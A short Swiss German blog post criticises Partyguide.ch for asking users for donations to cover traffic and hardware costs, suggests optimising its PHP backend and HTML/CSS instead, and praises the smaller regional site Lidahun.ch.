Der Betrieb einer Photo-Plattform in dieser Grössenordnung zieht (nicht) nur die KV-Angestellten der Banken und Versicherungen an - tagtäglich werden dort Gigabytes an Daten transferiert. Und wenn im Web heutzutage noch etwas kostet, dann ist es der "Traffic", oder einfacher gesagt, die Daten, die man über Mietleitungen an all die Besucher schicken muss. Anscheinend ist es Partyguide.ch nicht gelungen, diese ausschliesslich mit der nervigen Werbung zu decken (hat schon jemand mal auf eines dieser schicken Banners geklickt?), sondern setzt jetzt auch darauf, die Portemonnaies der Benutzer anzuzapfen:
Mit einem Gönnerbeitrag von Euch ist es möglich, dass wir unsere Hardware schneller aufrüsten können und auch in Zukunft auf agressive & störende Werbung, welche immer auf schlechtes Feedback stösst, grösstenteils verzichten können.
eMeidis Tipp: Statt für viel teures Geld die "Hardware aufzurüsten" einfach mal das Backend neu programmieren (ich glaube kaum, dass das PHP im Hintergrund auf Performance optimiert wurde), wie auch dank CSS entschlackten, verschlankten und sauberen HTML-Code ausgeben. Das kann schon Wunder wirken.
Heimatgefühle
Der Underdog Lidahun.ch, der nicht nur namentlich auf meine Heimat, das Sensler Oberland hindeutet, ist hier selbstverständlich eine Erwähnung wert. Weiter so!
Labels: Partyguide
Abonnieren
